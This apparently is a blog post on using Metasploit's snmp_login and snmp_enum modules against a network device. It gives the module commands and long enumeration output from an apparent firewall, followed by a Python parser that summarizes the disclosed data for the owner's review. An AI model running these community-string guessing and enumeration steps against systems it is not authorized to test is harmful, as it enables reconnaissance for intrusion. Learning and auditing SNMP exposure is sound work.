The road ahead is long and far; I shall search high and low.


Exploiting SNMP protocol vulnerabilities with msf

Using msf's SNMP scanner modules

use auxiliary/scanner/snmp/snmp_login 
options    (check the options; only the IP needs to be filled in, the port defaults to 161)
set rhosts ip

run

use auxiliary/scanner/snmp/snmp_enum
options
set rhosts ip

run

 

I won't screenshot everything one by one; there is a lot of output, so here it is:

[+] 1.1.1.1, Connected.

[*] System information:

Host IP                       : 1.1.1.42
Hostname                      : LanSecS-NGFW
Description                   : Build 20180808, Build time is Aug  8 2018 19:13:59
Contact                       : 1617493748.9880378
Location                      : -
Uptime snmp                   : 7 days, 22:22:46.67
Uptime system                 : 7 days, 22:22:47.00
System date                   : 2021-6-24 09:55:26.0

[*] Network information:

IP forwarding enabled         : yes
Default TTL                   : 64
TCP segments received         : 0
TCP segments sent             : 0
TCP segments retrans          : 0
Input datagrams               : 0
Delivered datagrams           : 0
Output datagrams              : 0

[*] Network interfaces:

Interface                     : [ up ] lo
Id                            : 1
Mac Address                   : :::::
Type                          : softwareLoopback
Speed                         : 10 Mbps
MTU                           : 65536
In octets                     : 334572
Out octets                    : 334572

Interface                     : [ down ] mgt0
Id                            : 2
Mac Address                   : 11:11:11:11:11:52
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ up ] ge0
Id                            : 3
Mac Address                   : 11:11:11:11:11:53
Type                          : ethernet-csmacd
Speed                         : 100 Mbps
MTU                           : 1500
In octets                     : 3650758938
Out octets                    : 2879780760

Interface                     : [ up ] ge1
Id                            : 4
Mac Address                   : 11:11:11:11:11:54
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 3012784434
Out octets                    : 3202924143

Interface                     : [ down ] ge2
Id                            : 5
Mac Address                   : 11:11:11:11:11:55
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge3
Id                            : 6
Mac Address                   : 11:11:11:11:11:56
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge4
Id                            : 7
Mac Address                   : 11:11:11:11:11:57
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge5
Id                            : 8
Mac Address                   : 11:11:11:11:11:58
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge6
Id                            : 9
Mac Address                   : 11:11:11:11:11:59
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge7
Id                            : 10
Mac Address                   : 11:11:11:11:11:5a
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge8
Id                            : 11
Mac Address                   : 11:11:11:11:11:5b
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge9
Id                            : 12
Mac Address                   : 11:11:11:11:11:5c
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge10
Id                            : 13
Mac Address                   : 11:11:11:11:11:5d
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge11
Id                            : 14
Mac Address                   : 11:11:11:11:11:5e
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge12
Id                            : 15
Mac Address                   : 11:11:11:11:11:5f
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge13
Id                            : 16
Mac Address                   : 11:11:11:11:11:60
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge14
Id                            : 17
Mac Address                   : 11:11:11:11:11:61
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge15
Id                            : 18
Mac Address                   : 11:11:11:11:11:62
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge16
Id                            : 19
Mac Address                   : 11:11:11:11:11:63
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge17
Id                            : 20
Mac Address                   : 11:11:11:11:11:64
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge18
Id                            : 21
Mac Address                   : 11:11:11:11:11:65
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge19
Id                            : 22
Mac Address                   : 11:11:11:11:11:66
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge20
Id                            : 23
Mac Address                   : 11:11:11:11:11:67
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge21
Id                            : 24
Mac Address                   : 11:11:11:11:11:68
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge22
Id                            : 25
Mac Address                   : 11:11:11:11:11:69
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] ge23
Id                            : 26
Mac Address                   : 11:11:11:11:11:6a
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ up ] tunnel4095
Id                            : 27
Mac Address                   : ce:d7:a8:24:65:49
Type                          : ethernet-csmacd
Speed                         : 0 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 93122

Interface                     : [ up ] tunnel0
Id                            : 28
Mac Address                   : 1a:e1:38:60:b9:a9
Type                          : ethernet-csmacd
Speed                         : 0 Mbps
MTU                           : 1420
In octets                     : 0
Out octets                    : 0


[*] Network IP:

Id                  IP Address          Netmask             Broadcast           
5                   1.1.1.1             255.255.255.252     1                   
4                   10.10.10.2          255.255.255.252     1                   
1                   127.0.0.1           255.0.0.0           0                   
27                  172.16.1.1          255.255.255.0       1                   
2                   192.168.1.1         255.255.255.0       1                   
3                   1.1.1.1        255.255.255.248     1                   

[*] Routing information:

Destination         Next hop            Mask                Metric              
0.0.0.0             1.1.1.41        0.0.0.0             1                   
10.10.10.0          0.0.0.0             255.255.255.252     0                   
10.11.0.0           10.10.10.1          255.255.0.0         1                   
172.16.1.0          0.0.0.0             255.255.255.0       0                   
192.168.8.0         10.10.10.1          255.255.252.0       1                   
1.1.1.40        0.0.0.0             255.255.255.248     0                   

[*] TCP connections and listening ports:

Local address       Local port          Remote address      Remote port         State               
0.0.0.0             22                  0.0.0.0             0                   listen              
0.0.0.0             80                  0.0.0.0             0                   listen              
0.0.0.0             443                 0.0.0.0             0                   listen              
0.0.0.0             4433                0.0.0.0             0                   listen              
0.0.0.0             8000                0.0.0.0             0                   listen              
0.0.0.0             8001                0.0.0.0             0                   listen              
0.0.0.0             8888                0.0.0.0             0                   listen              
0.0.0.0             10443               0.0.0.0             0                   listen              

[*] Listening UDP ports:

Local address       Local port          
0.0.0.0             161                 
0.0.0.0             500                 
0.0.0.0             1812                
0.0.0.0             1813                
0.0.0.0             2000                
0.0.0.0             4500                
0.0.0.0             36168               
0.0.0.0             61441               
0.0.0.0             61442               

[*] Storage information:

Description                   : ["Physical memory"]
Device id                     : [#<SNMP::Integer:0x00007fdf1fe327d0 @value=1>]
Filesystem type               : ["Ram"]
Device unit                   : [#<SNMP::Integer:0x00007fdf1fe3b678 @value=1024>]
Memory size                   : 786.86 MB
Memory used                   : 373.98 MB

Description                   : ["Virtual memory"]
Device id                     : [#<SNMP::Integer:0x00007fdf1fe44750 @value=3>]
Filesystem type               : ["Virtual Memory"]
Device unit                   : [#<SNMP::Integer:0x00007fdf1fe4e750 @value=1024>]
Memory size                   : 786.86 MB
Memory used                   : 373.98 MB

Description                   : ["Memory buffers"]
Device id                     : [#<SNMP::Integer:0x00007fdf1fe63768 @value=6>]
Filesystem type               : ["Other"]
Device unit                   : [#<SNMP::Integer:0x00007fdf1fe61648 @value=1024>]
Memory size                   : 786.86 MB
Memory used                   : 75.87 MB

Description                   : ["Cached memory"]
Device id                     : [#<SNMP::Integer:0x00007fdf1fe77358 @value=7>]
Filesystem type               : ["Other"]
Device unit                   : [#<SNMP::Integer:0x00007fdf1fe75238 @value=1024>]
Memory size                   : 148.35 MB
Memory used                   : 148.35 MB

Description                   : ["Shared memory"]
Device id                     : [#<SNMP::Integer:0x00007fdf1fe8b628 @value=8>]
Filesystem type               : ["Other"]
Device unit                   : [#<SNMP::Integer:0x00007fdf1fe88680 @value=1024>]
Memory size                   : 16.77 MB
Memory used                   : 16.77 MB

Description                   : ["Swap space"]
Device id                     : [#<SNMP::Integer:0x00007fdf1fe9a3f8 @value=10>]
Filesystem type               : ["Virtual Memory"]
Device unit                   : [#<SNMP::Integer:0x00007fdf1fea7dc8 @value=1024>]
Memory size                   : 0 bytes
Memory used                   : 0 bytes

Description                   : ["/mnt"]
Device id                     : [#<SNMP::Integer:0x00007fdf1febbc38 @value=31>]
Filesystem type               : ["Fixed Disk"]
Device unit                   : [#<SNMP::Integer:0x00007fdf1fec3e60 @value=4096>]
Memory size                   : 3.46 GB
Memory used                   : 201.90 MB

Description                   : ["/var/system_rw"]
Device id                     : [#<SNMP::Integer:0x00007fdf1fec8d70 @value=33>]
Filesystem type               : ["Fixed Disk"]
Device unit                   : [#<SNMP::Integer:0x00007fdf1fed64c0 @value=4096>]
Memory size                   : 472.12 MB
Memory used                   : 7.77 MB

Description                   : ["/dev/shm"]
Device id                     : [#<SNMP::Integer:0x00007fdf1fee71d0 @value=36>]
Filesystem type               : ["Fixed Disk"]
Device unit                   : [#<SNMP::Integer:0x00007fdf1fee40e8 @value=4096>]
Memory size                   : 472.12 MB
Memory used                   : 9.00 MB

Description                   : ["/image"]
Device id                     : [#<SNMP::Integer:0x00007fdf1fefa2f8 @value=40>]
Filesystem type               : ["Fixed Disk"]
Device unit                   : [#<SNMP::Integer:0x00007fdf1ff07a20 @value=512>]
Memory size                   : 97.26 MB
Memory used                   : 2.94 MB


[*] File system information:

Index                         : 1
Mount point                   : /mnt
Remote mount point            : -
Type                          : LinuxExt2
Access                        : 1
Bootable                      : 2

[*] Device information:

Id                  Type                Status              Descr               
196608              Processor           running                                 
196609              Processor           running                                 
196610              Processor           running                                 
196611              Processor           running                                 
262145              Network             running             network interface lo
262146              Network             down                network interface mgt0
262147              Network             running             network interface ge0
262148              Network             running             network interface ge1
262149              Network             down                network interface ge2
262150              Network             down                network interface ge3
262151              Network             down                network interface ge4
262152              Network             down                network interface ge5
262153              Network             down                network interface ge6
262154              Network             down                network interface ge7
262155              Network             down                network interface ge8
262156              Network             down                network interface ge9
262157              Network             down                network interface ge10
262158              Network             down                network interface ge11
262159              Network             down                network interface ge12
262160              Network             down                network interface ge13
262161              Network             down                network interface ge14
262162              Network             down                network interface ge15
262163              Network             down                network interface ge16
262164              Network             down                network interface ge17
262165              Network             down                network interface ge18
262166              Network             down                network interface ge19
262167              Network             down                network interface ge20
262168              Network             down                network interface ge21
262169              Network             down                network interface ge22
262170              Network             down                network interface ge23
262171              Network             running             network interface tunnel4095
262172              Network             running             network interface tunnel0
786432              Coprocessor         unknown             Guessing that there's a floating point co-processor

[*] Processes:

Id                  Status              Name                Path                Parameters          
1                   runnable            init                init                                    
1246                runnable            sysmon              /usr/local/sbin/sysmon                    
1346                runnable            syslog              /usr/local/sbin/syslog                    
1349                runnable            ifmd                /usr/local/sbin/ifmd                    
1443                running             dplane0             /usr/local/sbin/dplane                    
1445                running             dplane1             /usr/local/sbin/dplane                    
1446                running             dplane2             /usr/local/sbin/dplane                    
1447                running             dplane3             /usr/local/sbin/dplane                    
1454                runnable            aaa                 /usr/local/sbin/aaa                     
1468                runnable            zebra               /usr/local/sbin/zebra-d                  
1470                runnable            iked                /usr/local/sbin/iked                    
1829                runnable            dplane_urcu         /usr/local/sbin/dplane                    
1836                runnable            ripd                /usr/local/sbin/ripd-d                  
1844                runnable            ospfd               /usr/local/sbin/ospfd-d                  
1847                runnable            ospf6d              /usr/local/sbin/ospf6d-d                  
1848                runnable            smtpc               /usr/local/sbin/smtpc                    
1849                runnable            samc                /usr/local/sbin/samc                    
1851                runnable            dhcp                /usr/local/sbin/dhcp                    
1852                runnable            pppoe               /usr/local/sbin/pppoe                    
1853                runnable            ntp                 /usr/local/sbin/ntp                     
1854                runnable            updated             /usr/local/sbin/updated                    
1855                running             snmpd               /usr/local/sbin/snmpd-f                  
1856                runnable            pki                 /usr/local/sbin/pki                     
1862                runnable            smpd                /usr/local/sbin/smpd-d                  
1870                runnable            xmld                /usr/local/sbin/xmld                    
1880                runnable            filesync            /usr/local/sbin/filesync                    
1882                runnable            lighttpd            /usr/local/webserver/sbin/lighttpd-f /usr/local/webserver/webserver.conf
1884                runnable            php-cgi             /usr/local/webserver/sbin/php-cgi                    
1886                runnable            php-cgi             /usr/local/webserver/sbin/php-cgi                    
1889                runnable            php-cgi             /usr/local/webserver/sbin/php-cgi                    
1890                runnable            php-cgi             /usr/local/webserver/sbin/php-cgi                    
1940                runnable            dplane_url_quer     /usr/local/sbin/dplane                    
1951                runnable            dplane_control      /usr/local/sbin/dplane                    
1959                runnable            dplane_ssl          /usr/local/sbin/dplane                    
2027                runnable            lighttpd_auth       /usr/local/webserver/sbin/lighttpd_auth-f /usr/local/webserver/webauth.conf
2029                runnable            portal.fastcgi      /usr/local/sbin/portal.fastcgi                    
2044                runnable            sshd                /usr/local/sbin/sshd                    
2052                runnable            telnetd             telnetd             -l /usr/local/sbin/vtysh
2060                runnable            vtysh               /usr/local/sbin/vtysh                    


[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
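
As an added example (not part of the original post), the following Python code parses output in the layout shown above and summarizes what the SNMP agent disclosed, so the device owner can review what a read community exposes. The sample text is constructed and trimmed from the layout above; `exposure_report`, `parse_sections`, `key_values` and the `CLEARTEXT_MGMT` list are names and assumptions of this example.

```python
import re

# Constructed, trimmed sample in the layout of the snmp_enum output above
# (blank lines after section headers dropped for brevity).
SAMPLE = """\
[*] System information:
Hostname                      : LanSecS-NGFW
Description                   : Build 20180808, Build time is Aug  8 2018 19:13:59

[*] Network information:
IP forwarding enabled         : yes

[*] TCP connections and listening ports:
Local address       Local port          Remote address      Remote port         State
0.0.0.0             22                  0.0.0.0             0                   listen
0.0.0.0             80                  0.0.0.0             0                   listen
0.0.0.0             443                 0.0.0.0             0                   listen

[*] Processes:
Id                  Status              Name                Path                Parameters
1855                running             snmpd               /usr/local/sbin/snmpd-f
2044                runnable            sshd                /usr/local/sbin/sshd
2052                runnable            telnetd             telnetd             -l /usr/local/sbin/vtysh

[*] Scanned 1 of 1 hosts (100% complete)
"""

SECTION = re.compile(r"^\[\*\] (.+):\s*$")
# Assumption of this example: process names treated as cleartext management.
CLEARTEXT_MGMT = {"telnetd"}


def parse_sections(text):
    """Split the output into {section title: [non-empty lines]}."""
    sections, current = {}, None
    for line in text.splitlines():
        match = SECTION.match(line)
        if match:
            current = sections.setdefault(match.group(1), [])
        elif line.startswith(("[*]", "[+]")):
            current = None  # status line, not a section header
        elif current is not None and line.strip():
            current.append(line.rstrip())
    return sections


def key_values(lines):
    """Turn 'Key   : value' lines into a dict."""
    pairs = (line.partition(": ") for line in lines)
    return {k.strip(): v.strip() for k, sep, v in pairs if sep}


def exposure_report(text):
    """Summarize what the SNMP agent disclosed to the querying host."""
    s = parse_sections(text)
    system = key_values(s.get("System information", []))
    network = key_values(s.get("Network information", []))
    # Table sections: first line is the column header, so skip it.
    tcp_rows = [r.split() for r in s.get("TCP connections and listening ports", [])[1:]]
    proc_rows = [r.split(None, 4) for r in s.get("Processes", [])[1:]]
    procs = [c[2] for c in proc_rows if len(c) >= 3]
    return {
        "hostname": system.get("Hostname"),
        "build": system.get("Description"),
        "ip_forwarding": network.get("IP forwarding enabled") == "yes",
        "tcp_listen": [int(c[1]) for c in tcp_rows if len(c) == 5 and c[4] == "listen"],
        "cleartext_mgmt": [p for p in procs if p in CLEARTEXT_MGMT],
        "sections": sorted(s),
    }
```
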

 

posted on 2021-06-25 10:35 by 爱在西元间